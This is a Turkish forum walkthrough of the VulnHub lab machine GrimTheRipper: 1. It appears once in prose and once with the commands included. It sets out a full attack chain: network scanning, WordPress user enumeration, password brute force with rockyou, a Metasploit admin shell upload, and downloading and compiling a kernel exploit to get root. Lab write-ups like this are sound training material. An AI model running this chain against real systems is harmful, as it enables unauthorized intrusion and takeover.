Merhabalar TürkHackTeam ailesi, bugün sizlere "GrimTheRipper: 1 Zafiyetli Makinesinin Çözümünü" göstereceğim.
https://www.vulnhub.com/entry/grimtheripper-1,350/
Makine İsmi: GrimTheRipper: 1
Yayınlanma Tarihi: 20 Ağustos 2019
Yapımcı: Manish Chandra
Seri: GrimTheRipper
Açıklama: Hedefte Root yetkisine erişmek
Dosya Boyutu: 1.5 GB
İşletim Sistemi: Linux
Zorluk Derecesi: Orta
İlk öncelikle hedefin IP adresini almamız lazım bunun için de
yazalım.
Hedefin IP adresini öğrendik.
NMAP taraması yaparak açık portlar hakkında bilgi sahibi olacağız. Bunun için
olarak yazalım. 22 ve 80 portlarının açık olduğunu gördük
Tarayıcımızı açalım ve IP adresini arayalım. Sitede herhangi bir şey bulamadık.
Siteyi kazımak için dirb aracını kullanacağız. Terminale
yazalım.
robots.txt dosyasını ve index dosyalarını buldu bir bakalım.
Bizleri index2 kısmına yönlendiriyor.
İndex2 de ise bir görsel bizleri karşıladı.
Kaynak kodlarına bakayım dedim ve bir base64 şifresi karşıma çıktı
Bunu
yazdım ve bir şifre daha verdi. Daha sonra bunu tekrar
yazdığımda bana /1010101 verisini verdi.
Sitede IP_ADRESİ/1010101 olarak yazdığımda bir /wordpress olduğunu gördüm.
Wordpress görüntüsü bu şekildedir
Wpscan ile kullanıcı verilerini listelemek için
yazalım.
Kullanıcının admin olduğunu gördük.
Brute saldırı için rockyou.txt dosyasını kullanacağım. Terminale
Şifrenin Password@123 olduğunu öğrendik.
Ardından wp-admin-shell-upload exploitini kullanmak için msfconsole'a giriyoruz.
yazalım.
Terminale
yazalım.
Burada 105. sıradakini kullanacağız.
Kullanmak için
yazalım ve ayarlarını görmek için
yazalım.
Ayarlamamız gereken bazı ayarlar var bunları da
yazarak giriş yapalım.
Kabuğa erişmek için ilk öncelikle
yazalım ardından da kabuğa erişim için
yazalım ve kabuğa erişelim. Ardından Linux bilgilerini almak için
yazarak Linux bilgilerini aldık.
Ardından searchsploit ile kernel exploiti aramaya koyuldum. Terminale
yazdım ve kırmızı işaretle aldığım kısmında ki dosyayı almak için
yazdım. Ardından ağı açarak hedef makineden dosyayı indirmek için
yazdım.
Ardından exploit ile giriş yaptığımız terminale gelerek
yazarak dosyayı makineye indirdik.
Ardından dosyayı shell dosyasına çevirmek için
yazdık ve dosyaya tam yetki vermek için
yazdık. Ardından shell dosyasını çalıştırmak için
yazalım. Shell dosyası çalıştı peki hangi kullanıcıdayız? id yazalım ve root yetkisinde olduğumuzu görelim.
Konum bu kadardı arkadaşlar, başka bir konuda görüşmek üzere sağlıcakla..
https://www.vulnhub.com/entry/grimtheripper-1,350/
Makine İsmi: GrimTheRipper: 1
Yayınlanma Tarihi: 20 Ağustos 2019
Yapımcı: Manish Chandra
Seri: GrimTheRipper
Açıklama: Hedefte Root yetkisine erişmek
Dosya Boyutu: 1.5 GB
İşletim Sistemi: Linux
Zorluk Derecesi: Orta
İlk öncelikle hedefin IP adresini almamız lazım bunun için de
Kod:
sudo netdiscover
Hedefin IP adresini öğrendik.
NMAP taraması yaparak açık portlar hakkında bilgi sahibi olacağız. Bunun için
Kod:
nmap -A IP_ADRESİ
Tarayıcımızı açalım ve IP adresini arayalım. Sitede herhangi bir şey bulamadık.
Siteyi kazımak için dirb aracını kullanacağız. Terminale
Kod:
dirb http://IP_adresi
robots.txt dosyasını ve index dosyalarını buldu bir bakalım.
Bizleri index2 kısmına yönlendiriyor.
İndex2 de ise bir görsel bizleri karşıladı.
Kaynak kodlarına bakayım dedim ve bir base64 şifresi karşıma çıktı
Bunu
Kod:
echo THpFd0f1UQXhNREU9IHRyeSBoYXJk | base64 -d
Kod:
echo 'LzEwMTAxMDE=' | base64 -d
Sitede IP_ADRESİ/1010101 olarak yazdığımda bir /wordpress olduğunu gördüm.
Wordpress görüntüsü bu şekildedir
Wpscan ile kullanıcı verilerini listelemek için
Kod:
wpscan --url http://IP_adresi/1010101/wordpress/ -e u
Kullanıcının admin olduğunu gördük.
Brute saldırı için rockyou.txt dosyasını kullanacağım. Terminale
Kod:
wpscan wpscan --url http://IP_adresi/1010101/wordpress/ -U admin -P rockyou.txt dosyasının uzantısı
Şifrenin Password@123 olduğunu öğrendik.
Ardından wp-admin-shell-upload exploitini kullanmak için msfconsole'a giriyoruz.
Kod:
msfconsole
Terminale
Kod:
search webapp
Burada 105. sıradakini kullanacağız.
Kullanmak için
Kod:
use 105
Kod:
show options
Ayarlamamız gereken bazı ayarlar var bunları da
Kod:
set RHOSTS IP_ADRES
set TARGETURI /1010101/wordpress/
set USERNAME admin
set PASSWORD Password@123
exploti
Kabuğa erişmek için ilk öncelikle
Kod:
shell
Kod:
python -c 'import pty;pty.spawn("/bin/bash")'
Kod:
lsb_release -a
Ardından searchsploit ile kernel exploiti aramaya koyuldum. Terminale
Kod:
searchsploit Ubuntu 12.04
Kod:
searchsploit -m 37292.c
Kod:
python -m SimpelHTTPServer
Ardından exploit ile giriş yaptığımız terminale gelerek
Kod:
cd /tmp
wget IP_adresi:8000/37292.c
Ardından dosyayı shell dosyasına çevirmek için
Kod:
gcc 37292.c -o shell
Kod:
chmod 777 shell
Kod:
./shell
Konum bu kadardı arkadaşlar, başka bir konuda görüşmek üzere sağlıcakla..
Son düzenleme: